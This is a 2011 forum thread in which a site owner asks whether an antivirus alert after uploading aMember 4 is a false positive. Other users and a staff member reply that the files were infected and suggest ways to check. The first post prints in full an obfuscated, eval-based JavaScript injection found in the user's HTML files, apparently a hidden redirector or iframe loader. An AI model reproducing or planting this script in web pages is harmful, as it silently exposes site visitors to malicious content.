False virus - Amember 4?

thared33 · Dec 9, 2011

The only thing I remember doing different compared to usual is uploading the Amember 4 files to my server. After that I start getting Avast notifications that there's a trojan or something. It says the infection is called JS:Redirector-MK [Tri]

I had someone look into the code on some of my pages and it seems the following has been added to particular html files:

<script>var s=new String();a=document.getElementById.toString().substr(0,4);if((a=="func")||(a=="unct")){r=1;c=String;}if(r&&document.createTextNode)y=2;e=window.eval;m=Array(4.5*y,18/y,52.5*y,204/y,16*y,80/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,206/y,50.5*y,232/y,34.5*y,216/y,50.5*y,218/y,50.5*y,220/y,58*y,230/y,33*y,242/y,42*y,194/y,51.5*y,156/y,48.5*y,218/y,50.5*y,80/y,19.5*y,196/y,55.5*y,200/y,60.5*y,78/y,20.5*y,182/y,24*y,186/y,20.5*y,246/y,4.5*y,18/y,4.5*y,210/y,51*y,228/y,48.5*y,218/y,50.5*y,228/y,20*y,82/y,29.5*y,18/y,4.5*y,250/y,16*y,202/y,54*y,230/y,50.5*y,64/y,61.5*y,18/y,4.5*y,18/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,238/y,57*y,210/y,58*y,202/y,20*y,68/y,30*y,210/y,51*y,228/y,48.5*y,218/y,50.5*y,64/y,57.5*y,228/y,49.5*y,122/y,19.5*y,208/y,58*y,232/y,56*y,116/y,23.5*y,94/y,51*y,194/y,57.5*y,232/y,50.5*y,228/y,50*y,234/y,56*y,200/y,48.5*y,232/y,50.5*y,92/y,49.5*y,222/y,54.5*y,94/y,58*y,202/y,54.5*y,224/y,23.5*y,230/y,58*y,194/y,58*y,92/y,56*y,208/y,56*y,78/y,16*y,238/y,52.5*y,200/y,58*y,208/y,30.5*y,78/y,24.5*y,96/y,19.5*y,64/y,52*y,202/y,52.5*y,206/y,52*y,232/y,30.5*y,78/y,24.5*y,96/y,19.5*y,64/y,57.5*y,232/y,60.5*y,216/y,50.5*y,122/y,19.5*y,236/y,52.5*y,230/y,52.5*y,196/y,52.5*y,216/y,52.5*y,232/y,60.5*y,
116/y,52*y,210/y,50*y,200/y,50.5*y,220/y,29.5*y,224/y,55.5*y,230/y,52.5*y,232/y,52.5*y,222/y,55*y,116/y,48.5*y,196/y,57.5*y,222/y,54*y,234/y,58*y,202/y,29.5*y,216/y,50.5*y,204/y,58*y,116/y,24*y,118/y,58*y,222/y,56*y,116/y,24*y,118/y,19.5*y,124/y,30*y,94/y,52.5*y,204/y,57*y,194/y,54.5*y,202/y,31*y,68/y,20.5*y,118/y,4.5*y,18/y,62.5*y,18/y,4.5*y,204/y,58.5*y,220/y,49.5*y,232/y,52.5*y,222/y,55*y,64/y,52.5*y,204/y,57*y,194/y,54.5*y,202/y,57*y,80/y,20.5*y,246/y,4.5*y,18/y,4.5*y,236/y,48.5*y,228/y,16*y,204/y,16*y,122/y,16*y,200/y,55.5*y,198/y,58.5*y,218/y,50.5*y,220/y,58*y,92/y,49.5*y,228/y,50.5*y,194/y,58*y,202/y,34.5*y,216/y,50.5*y,218/y,50.5*y,220/y,58*y,80/y,19.5*y,210/y,51*y,228/y,48.5*y,218/y,50.5*y,78/y,20.5*y,118/y,51*y,92/y,57.5*y,202/y,58*y,130/y,58*y,232/y,57*y,210/y,49*y,234/y,58*y,202/y,20*y,78/y,57.5*y,228/y,49.5*y,78/y,22*y,78/y,52*y,232/y,58*y,224/y,29*y,94/y,23.5*y,204/y,48.5*y,230/y,58*y,202/y,57*y,200/y,58.5*y,224/y,50*y,194/y,58*y,202/y,23*y,198/y,55.5*y,218/y,23.5*y,232/y,50.5*y,218/y,56*y,94/y,57.5*y,232/y,48.5*y,232/y,23*y,224/y,52*y,224/y,19.5*y,82/y,29.5*y,204/y,23*y,230/y,58*y,242/y,54*y,202/y,23*y,236/y,52.5*y,230/y,52.5*y,196/y,52.5*y,216/y,52.5*y,232/y,60.5*y,122/y,19.5*y,208/y,52.5*y,200/y,50*y,202/y,55*y,78/y,29.5*y,204/y,23*y,230/y,58*y,
242/y,54*y,202/y,23*y,224/y,55.5*y,230/y,52.5*y,232/y,52.5*y,222/y,55*y,122/y,19.5*y,194/y,49*y,230/y,55.5*y,216/y,58.5*y,232/y,50.5*y,78/y,29.5*y,204/y,23*y,230/y,58*y,242/y,54*y,202/y,23*y,216/y,50.5*y,204/y,58*y,122/y,19.5*y,96/y,19.5*y,118/y,51*y,92/y,57.5*y,232/y,60.5*y,216/y,50.5*y,92/y,58*y,222/y,56*y,122/y,19.5*y,96/y,19.5*y,118/y,51*y,92/y,57.5*y,202/y,58*y,130/y,58*y,232/y,57*y,210/y,49*y,234/y,58*y,202/y,20*y,78/y,59.5*y,210/y,50*y,232/y,52*y,78/y,22*y,78/y,24.5*y,96/y,19.5*y,82/y,29.5*y,204/y,23*y,230/y,50.5*y,232/y,32.5*y,232/y,58*y,228/y,52.5*y,196/y,58.5*y,232/y,50.5*y,80/y,19.5*y,208/y,50.5*y,210/y,51.5*y,208/y,58*y,78/y,22*y,78/y,24.5*y,96/y,19.5*y,82/y,29.5*y,18/y,4.5*y,18/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,206/y,50.5*y,232/y,34.5*y,216/y,50.5*y,218/y,50.5*y,220/y,58*y,230/y,33*y,242/y,42*y,194/y,51.5*y,156/y,48.5*y,218/y,50.5*y,80/y,19.5*y,196/y,55.5*y,200/y,60.5*y,78/y,20.5*y,182/y,24*y,186/y,23*y,194/y,56*y,224/y,50.5*y,220/y,50*y,134/y,52*y,210/y,54*y,200/y,20*y,204/y,20.5*y,118/y,4.5*y,18/y,62.5*y);if((a=="func")||(a=="unct"))if(document.createTextNode)with(c)mm=fromCharCode;for(i=0;i!=m.length;i++)s+=mm(e("m"+"["+"i"+']'));e(s);</script>
Click to expand...

Is the above script something that Amember adds to certain pages or something? My webhosting company said they scanned everything and found nothing. Maybe all of this is a false positive when I scan with Avast.

davidm1 · Dec 10, 2011

That looks like a a virus added to your code. Your server may have been hacked.

David

alex · Dec 10, 2011

There are no such strings in aMember files, you may check it.

I recommend you to check your desktop for viruses (using Antivirus CD or bootable Flash). If that is clean, it worth to check hosting settings.

On some hostings PHP processes are able to write to executable PHP files. It is not good from security point of view. If you checked your desktop and found nothing, please contact us via helpdesk with FTP info and we will run checks to find out something. Also, what other scripts (and what versions) are you running in same hosting account?

alex · Dec 10, 2011

And no, it is not false positive. Your files were been somehow infected.

False virus - Amember 4?

thared33 Member

davidm1 aMember User & Partner

alex aMember Pro Customer Staff Member

alex aMember Pro Customer Staff Member

Share This Page

False virus - Amember 4?

thared33 Member

davidm1 aMember User & Partner

alex aMember Pro Customer Staff Member

alex aMember Pro Customer Staff Member

Share This Page

Useful Searches